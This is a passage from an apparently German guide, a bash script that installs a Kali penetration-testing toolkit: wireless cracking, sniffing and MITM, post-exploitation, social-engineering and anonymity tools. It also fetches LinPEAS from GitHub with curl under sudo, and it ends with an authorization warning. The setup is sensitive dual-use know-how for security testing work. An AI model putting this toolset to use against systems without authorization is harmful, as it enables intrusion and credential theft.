for pkg in "${PASS_TOOLS[@]}"; do install_apt "$pkg"; done

# Rockyou Wortliste entpacken
if [[ -f "/usr/share/wordlists/rockyou.txt.gz" ]]; then
    info "Entpacke rockyou.txt..."
    gunzip -f /usr/share/wordlists/rockyou.txt.gz >> "$LOG_FILE" 2>&1 && success "rockyou.txt entpackt." || warn "rockyou.txt bereits entpackt."
fi

# =============================================================================
section "Wireless & WLAN"
WIRELESS_TOOLS=(
    aircrack-ng
    wifite
    kismet
    reaver
    pixiewps
    bully
    cowpatty
    mdk3
    mdk4
)
for pkg in "${WIRELESS_TOOLS[@]}"; do install_apt "$pkg"; done

# =============================================================================
section "Sniffing & Traffic-Analyse"
SNIFF_TOOLS=(
    wireshark
    tshark
    tcpdump
    bettercap
    ettercap-graphical
    dsniff
    mitmproxy
    responder
)
for pkg in "${SNIFF_TOOLS[@]}"; do install_apt "$pkg"; done

# =============================================================================
section "Post-Exploitation & Privilege Escalation"
POSTEX_TOOLS=(
    bloodhound
    neo4j
)
for pkg in "${POSTEX_TOOLS[@]}"; do install_apt "$pkg"; done

# LinPEAS herunterladen
if [[ ! -f "/opt/linpeas.sh" ]]; then
    info "Lade LinPEAS herunter..."
    curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /opt/linpeas.sh >> "$LOG_FILE" 2>&1
    chmod +x /opt/linpeas.sh
    success "LinPEAS nach /opt/linpeas.sh installiert."
else
    warn "LinPEAS bereits vorhanden."
    ((SUCCESS_COUNT++))
fi

# =============================================================================
section "Forensics & Reverse Engineering"
FORENSIC_TOOLS=(
    volatility3
    binwalk
    ghidra
    radare2
    foremost
    scalpel
    testdisk
    autopsy
    chkrootkit
    rkhunter
)
for pkg in "${FORENSIC_TOOLS[@]}"; do install_apt "$pkg"; done

# =============================================================================
section "Social Engineering"
SE_TOOLS=(
    set
    gophish
)
for pkg in "${SE_TOOLS[@]}"; do install_apt "$pkg"; done

# =============================================================================
section "Extras & Hilfsmittel"
EXTRA_TOOLS=(
    proxychains4
    tor
    macchanger
    steghide
    exiftool
    hashid
    pwncat
    socat
    netcat-openbsd
    tmux
    vim
    jq
)
for pkg in "${EXTRA_TOOLS[@]}"; do install_apt "$pkg"; done

# GoWitness installieren (Go)
if ! command -v gowitness &>/dev/null; then
    info "Installiere GoWitness (Go)..."
    go install github.com/sensepost/gowitness@latest >> "$LOG_FILE" 2>&1 && \
    cp ~/go/bin/gowitness /usr/local/bin/ 2>/dev/null && \
    success "GoWitness installiert." || { error "GoWitness Installation fehlgeschlagen."; FAILED_TOOLS+=("gowitness"); }
else
    warn "GoWitness bereits installiert."
    ((SUCCESS_COUNT++))
fi

# Caido installieren (falls im Kali-Repo vorhanden)
install_apt caido || warn "Caido nicht im Repo – manuell von caido.io installieren."

# =============================================================================
section "Aufräumen"
apt-get autoremove -y -qq >> "$LOG_FILE" 2>&1
apt-get clean >> "$LOG_FILE" 2>&1
success "Aufgeräumt."

# =============================================================================
echo ""
log "${BOLD}${GREEN}╔══════════════════════════════════════════════════════════╗${NC}"
log "${BOLD}${GREEN}║                 INSTALLATION ABGESCHLOSSEN               ║${NC}"
log "${BOLD}${GREEN}╚══════════════════════════════════════════════════════════╝${NC}"
log "  Erfolgreich installiert: ${GREEN}${SUCCESS_COUNT} Tools${NC}"

if [[ ${#FAILED_TOOLS[@]} -gt 0 ]]; then
    log "  ${YELLOW}Fehlgeschlagen (${#FAILED_TOOLS[@]}):${NC} ${FAILED_TOOLS[*]}"
    warn "Diese Tools manuell prüfen oder über pip/gem/go installieren."
else
    log "  ${GREEN}Keine Fehler – alle Tools installiert!${NC}"
fi

log ""
log "  Logfile: $LOG_FILE"
log "  Ende:    $(date)"
log ""
log "${BOLD}Nächste Schritte:${NC}"
log "  • rockyou.txt: /usr/share/wordlists/rockyou.txt"
log "  • SecLists:    /usr/share/seclists/"
log "  • LinPEAS:     /opt/linpeas.sh"
log "  • Metasploit:  msfconsole"
log "  • GoWitness:   gowitness"
log ""
log "${BOLD}${RED}WICHTIG: Nur auf eigenen/autorisierten Systemen nutzen! (§ 202a StGB)${NC}"
echo ""

✅ Einzeiler-Befehl
Das Script lokal speichern (nano kali_pentest_install.sh), Inhalt einfügen, dann ausführen:
chmod +x kali_pentest_install.sh && sudo ./kali_pentest_install.sh


Weiterführende Ressourcen